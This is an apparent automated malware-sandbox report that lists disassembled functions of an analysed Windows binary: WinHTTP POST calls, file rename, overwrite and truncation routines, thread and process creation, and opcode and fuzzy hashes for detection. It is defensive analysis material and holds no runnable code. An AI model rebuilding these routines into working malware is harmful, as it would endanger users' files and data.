      Function 00CA3CBD Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63COMMON
      Download Yara Rule
      APIs
      • WinHttpOpen.WINHTTP(00CAA3C0,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3CD3
      • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3CE7
      • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00CA3D08
      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3D21
      • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3D2D
      • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3D37
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00CA3D3C
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00CA3D42
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend
      • String ID: POST
      • API String ID: 4150888541-1814004025
      • Opcode ID: 274712ab1d711a49c8ab655bd81c8b0df35a86ad6046f3ad06f946733a29594d
      • Instruction ID: 39e2904b877d07c2985260bf34db92471bc848921c056cd31d40b508ac9a5053
      • Opcode Fuzzy Hash: 274712ab1d711a49c8ab655bd81c8b0df35a86ad6046f3ad06f946733a29594d
      • Instruction Fuzzy Hash: 1C111E35902169FBCB215FA29C4CEDF7F7DEF4BBA8B004415F909A3110D7348A11DAA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA8C42 Relevance: 12.2, APIs: 8, Instructions: 207fileCOMMON
      Download Yara Rule
      APIs
      • MoveFileW.KERNEL32(?,?), ref: 00CA8CD3
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00CA8CF1
      • SetFilePointerEx.KERNEL32(00000001,?,?,?,00000002), ref: 00CA8E3F
      • WriteFile.KERNEL32(00000001,?,?,?,00000000), ref: 00CA8E59
      • SetEndOfFile.KERNEL32(00000001), ref: 00CA8E6F
        • Part of subcall function 00CA8AF1: SetFilePointerEx.KERNEL32(?,00000000,?,?,00000000), ref: 00CA8B28
        • Part of subcall function 00CA8AF1: WriteFile.KERNEL32(?,?,00040000,?,00000000), ref: 00CA8B3F
      • FlushFileBuffers.KERNEL32(00000001), ref: 00CA8E8E
      • CloseHandle.KERNEL32(?), ref: 00CA8E9E
      • MoveFileW.KERNEL32(?,?), ref: 00CA8EB0
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$MovePointerWrite$BuffersCloseCreateFlushHandle
      • String ID:
      • API String ID: 4283038262-0
      • Opcode ID: cbe5700ade3f563ff58c8cb4c60f09231d22871caa411c952147dcd31db094a6
      • Instruction ID: 79b20fd4879eec7a03200be3c80fa11b4ba3c456c6c28df32f64a0192adfbca4
      • Opcode Fuzzy Hash: cbe5700ade3f563ff58c8cb4c60f09231d22871caa411c952147dcd31db094a6
      • Instruction Fuzzy Hash: C771AF71A0020AEFDF119FA4CC45FEEBBB9BF09308F044429F915E6251DB759A18DB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA8EBE Relevance: 12.1, APIs: 8, Instructions: 86fileCOMMON
      Download Yara Rule
      APIs
      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8ED8
      • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8EEE
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8EFD
      • GetFileAttributesW.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8F1B
      • SetFileAttributesW.KERNEL32(?,00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8F3C
        • Part of subcall function 00CA8782: GetFileAttributesW.KERNEL32(?), ref: 00CA87F3
        • Part of subcall function 00CA8782: GetFileAttributesW.KERNEL32(?), ref: 00CA8816
        • Part of subcall function 00CA8782: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00CA8835
        • Part of subcall function 00CA8782: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 00CA885C
        • Part of subcall function 00CA8782: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00CA888C
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00CA8F8F
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00CA8F94
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8F9C
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Attributes$CloseCreateHandlePointer$Size
      • String ID:
      • API String ID: 3440144462-0
      • Opcode ID: dc6981b437840034f2bd78cbfb24a733337fd19729b8075e7525d7e8f92fb24a
      • Instruction ID: b6e3b773c2668219219337b6f4441eb473498b06049854e56af0def473862f50
      • Opcode Fuzzy Hash: dc6981b437840034f2bd78cbfb24a733337fd19729b8075e7525d7e8f92fb24a
      • Instruction Fuzzy Hash: EE312F7090020BAFDF119FE5DC44BBEBBB9EF06328F144115F925A2290DB348A58DB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA242F Relevance: 12.1, APIs: 8, Instructions: 64threadsleepsynchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00CA2C15), ref: 00CA2444
      • CreateThread.KERNEL32(00000000,00000000,00CA454B,00000000,00000000,00000000), ref: 00CA245A
        • Part of subcall function 00CA4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00CA2C6F,00000001), ref: 00CA4F95
        • Part of subcall function 00CA4F7A: CloseHandle.KERNEL32(?,?,00CA2C6F,00000001), ref: 00CA4F9E
      • Sleep.KERNEL32(00000064), ref: 00CA2472
      • SetEvent.KERNEL32(00000000), ref: 00CA2486
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA2495
      • GetExitCodeThread.KERNEL32(?,?), ref: 00CA24A4
      • CloseHandle.KERNEL32(00000000), ref: 00CA24B1
      • CloseHandle.KERNEL32(?), ref: 00CA24B8
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateEventThread$CodeExitMutexObjectReleaseSingleSleepWait
      • String ID:
      • API String ID: 2313513115-0
      • Opcode ID: 2ad54f9ab6cc2047a0c0ee0218830a933beb2aa2d005ea1e9b748a8821f7f816
      • Instruction ID: f89130d804ddf0ad252a96222ad89b2b5c353f52ef0fa86ebaece85a81485fbc
      • Opcode Fuzzy Hash: 2ad54f9ab6cc2047a0c0ee0218830a933beb2aa2d005ea1e9b748a8821f7f816
      • Instruction Fuzzy Hash: 53118835A00629BBD7216BAA9C8CFAF7F7DEBCBB59F104116F512A3150D7744A00CA71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA5376 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationCOMMON
      Download Yara Rule
      APIs
      • LeaveCriticalSection.KERNEL32(00CA1FEB,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5387
      • WaitForSingleObject.KERNEL32(A0A815FF,000000FF,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5392
      • EnterCriticalSection.KERNEL32(00CA1FEB,00CA1FDB,00000000,00000000,00CA58E8,00000000,0000010C,00000000,00000000,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA539D
      • ResetEvent.KERNEL32(468B00CA,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53B3
      • ResetEvent.KERNEL32(CAA0A815,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53CA
      • LeaveCriticalSection.KERNEL32(00CA1FEB,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53D9
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeaveReset$EnterObjectSingleWait
      • String ID:
      • API String ID: 622437971-0
      • Opcode ID: 142ee27ef5876cee489706892b845a280271a7eb4ed216d6b3a8e253561e7999
      • Instruction ID: 669f57f20ce4d125e31bda764002299ac37086d260129463574f720e46c0d65e
      • Opcode Fuzzy Hash: 142ee27ef5876cee489706892b845a280271a7eb4ed216d6b3a8e253561e7999
      • Instruction Fuzzy Hash: B3018871102A12DBDB205F29DC40E1AB7F9EF527E93218A19E4A7D3170D3B0EC01CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA32A6 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00CA339F), ref: 00CA32AB
      • DeleteCriticalSection.KERNEL32(0000000C,?,00CA339F), ref: 00CA32B2
      • CloseHandle.KERNEL32(00000000,?,00CA339F), ref: 00CA32C5
      • CloseHandle.KERNEL32(?,?,00CA339F), ref: 00CA32CF
      • CloseHandle.KERNEL32(?,?,00CA339F), ref: 00CA32D9
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$DeleteEnter
      • String ID:
      • API String ID: 622934417-0
      • Opcode ID: a56d9f852343960af949c4f17ddd97db9ef94e45e7f1b965f773238b2d5d0fa6
      • Instruction ID: 448735c586b2cda25ee9567256eb33f0acce10d7d805f6a07dbfc861dbe1b1c6
      • Opcode Fuzzy Hash: a56d9f852343960af949c4f17ddd97db9ef94e45e7f1b965f773238b2d5d0fa6
      • Instruction Fuzzy Hash: A4F0B4313002025B96616B29DC85F2BB3FC9EE6B54315050EF415D3541DB35FA41DA61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA33C5 Relevance: 7.5, APIs: 5, Instructions: 18COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00000000,00CA57AF), ref: 00CA33CB
      • SetEvent.KERNEL32(?), ref: 00CA33DE
      • SetEvent.KERNEL32(00000000), ref: 00CA33E2
      • SetEvent.KERNEL32(?), ref: 00CA33E7
      • LeaveCriticalSection.KERNEL32(0000000C), ref: 00CA33EA
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Event$CriticalSection$EnterLeave
      • String ID:
      • API String ID: 259983309-0
      • Opcode ID: fb98a910d8a9f1b6b3ce4ba06fde650bb060d8e731a74b22882c5c08bf7ab130
      • Instruction ID: 7569eb10979e3de8020eb0d2b90bb56df76293b091f3d24998574660b40c31ef
      • Opcode Fuzzy Hash: fb98a910d8a9f1b6b3ce4ba06fde650bb060d8e731a74b22882c5c08bf7ab130
      • Instruction Fuzzy Hash: 92D06776100644EFD6216B66ED88E4B7FAAEFC93653128818E19742431C732A859DF22
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA411D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA4147
      • GetProcAddress.KERNEL32(00000000), ref: 00CA414E
      • CoGetObject.OLE32(?,?,00CAA1F0,?), ref: 00CA41A1
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleObjectProc
      • String ID: $
      • API String ID: 4150452153-3993045852
      • Opcode ID: 1aee0476a6520c024e5c6cdf1098b1a4b7f654d3e217223403f3603e6f7aae82
      • Instruction ID: abf33b28e2f0488645b11481caad7d7640f5c8a00a315c47f2b8b8e421348c15
      • Opcode Fuzzy Hash: 1aee0476a6520c024e5c6cdf1098b1a4b7f654d3e217223403f3603e6f7aae82
      • Instruction Fuzzy Hash: 6B415A71A0021AEFDF14CFE0D849AAEBBB9FF8A708F104059F511E7250D7719A45CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA489E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76processCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
        • Part of subcall function 00CA5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00CA5B3B,00000000,00000000,00000000,00CA37EB,00000000), ref: 00CA5B19
      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00CA4908
      • CloseHandle.KERNEL32(?), ref: 00CA491E
      • CloseHandle.KERNEL32(?), ref: 00CA4923
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$CloseHeapModuleProcess$AddressAllocateCreateFileNameProc
      • String ID: D
      • API String ID: 2446471772-2746444292
      • Opcode ID: 6461c406d9926ca55572b95e7574bb45a1fd1884ba76906bb777629eacea2e9d
      • Instruction ID: c83ceb07f284524596849bb3c10e5cd53a77f963fa60217c0d2db04e30127e02
      • Opcode Fuzzy Hash: 6461c406d9926ca55572b95e7574bb45a1fd1884ba76906bb777629eacea2e9d
      • Instruction Fuzzy Hash: 9D11947290021DBFDB14ABF4DC869DFBF7CEB4AB64F100016F205A6141DB709A45D6A1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA56B3 Relevance: 6.1, APIs: 4, Instructions: 138synchronizationthreadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA32FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,00CA56C4), ref: 00CA331E
        • Part of subcall function 00CA32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3371
        • Part of subcall function 00CA32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA337B
        • Part of subcall function 00CA32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3386
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
      • CreateThread.KERNEL32(00000000,00000001,00CA54BF,?,00000000,00000000), ref: 00CA5746
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA57A4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 00CA57B9
      • CloseHandle.KERNEL32(?), ref: 00CA57CB
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Create$Event$HandleHeapWait$AddressAllocateCloseCountCriticalInitializeModuleMultipleObjectObjectsProcProcessSectionSingleSpinThread
      • String ID:
      • API String ID: 3126403127-0
      • Opcode ID: 5424a2610aed0b78ccb10045a7a4d8b542d3d714492086a95c263f7f9a2db25f
      • Instruction ID: a8347389d6e7ef878babb2db799b01583bf37b35a57b5bacd74d60b10f1c7ea5
      • Opcode Fuzzy Hash: 5424a2610aed0b78ccb10045a7a4d8b542d3d714492086a95c263f7f9a2db25f
      • Instruction Fuzzy Hash: 11412471604B03AFD710AF20CCC2F2AB3A8EF46718F104A29F921961D2EB71DD949B91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA8B60 Relevance: 6.1, APIs: 4, Instructions: 87fileCOMMON
      Download Yara Rule
      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00CA8B7C
      • __aulldiv.LIBCMT ref: 00CA8BAB
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000003,00000000), ref: 00CA8BE9
      • ReadFile.KERNEL32(?,?,00040000,?,00000000), ref: 00CA8C0E
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Pointer$Read__aulldiv
      • String ID:
      • API String ID: 3696392486-0
      • Opcode ID: c9e1b9e51a0311fe81fb2e5fc04eb358124223f28906fbfa4c82d6702e4ddd4e
      • Instruction ID: da237428f1e77f7db83e58cb86ebff6df14fc2f014dc00ada5e2c3b68442029b
      • Opcode Fuzzy Hash: c9e1b9e51a0311fe81fb2e5fc04eb358124223f28906fbfa4c82d6702e4ddd4e
      • Instruction Fuzzy Hash: 13314FB1D0122AAFCF21CFA5DC44AAFBBB8FB05768F114026F955B3250D7708A41CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3772 Relevance: 6.1, APIs: 4, Instructions: 84memoryfileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,?), ref: 00CA37A7
      • AllocConsole.KERNEL32 ref: 00CA37C0
      • GetStdHandle.KERNEL32(000000F5), ref: 00CA37C8
      • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00CA381C
        • Part of subcall function 00CA90A1: GetProcessHeap.KERNEL32(00000000,00CA633F,00CA62A2,00000000,00000010,00000000,00000020,00CA633F,00000040,00CA2A6F,00CAB410), ref: 00CA90A7
        • Part of subcall function 00CA90A1: RtlFreeHeap.NTDLL(00000000), ref: 00CA90AE
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AllocAllocateConsoleCountCreateCriticalFileFreeHandleInitializeSectionSpin
      • String ID:
      • API String ID: 2520791297-0
      • Opcode ID: a8e23bba24cebdf5f60924442f6e079ccc81bc785cae67dfa1648ae9d114e758
      • Instruction ID: 56d7cacb38cfa7368e118adc7610bde5d83e2380fd25f428c4dad75abbc2b513
      • Opcode Fuzzy Hash: a8e23bba24cebdf5f60924442f6e079ccc81bc785cae67dfa1648ae9d114e758
      • Instruction Fuzzy Hash: F12135B260034337E2212A669C96B7B365CDF677BDF000226F935950C2DB388F8186E5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA86B7 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
      Download Yara Rule
      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00CA86EA
      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00CA8713
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8737
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8766
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite
      • String ID:
      • API String ID: 539440098-0
      • Opcode ID: 577139a35272c79bbd5225d4fb09a94ea38ad3c7a8befadbb8d099311a00dd40
      • Instruction ID: 4c65a1710210c7efd76c905d9c1ad759b04c35bb57d054d2bb2abc9b98e248e2
      • Opcode Fuzzy Hash: 577139a35272c79bbd5225d4fb09a94ea38ad3c7a8befadbb8d099311a00dd40
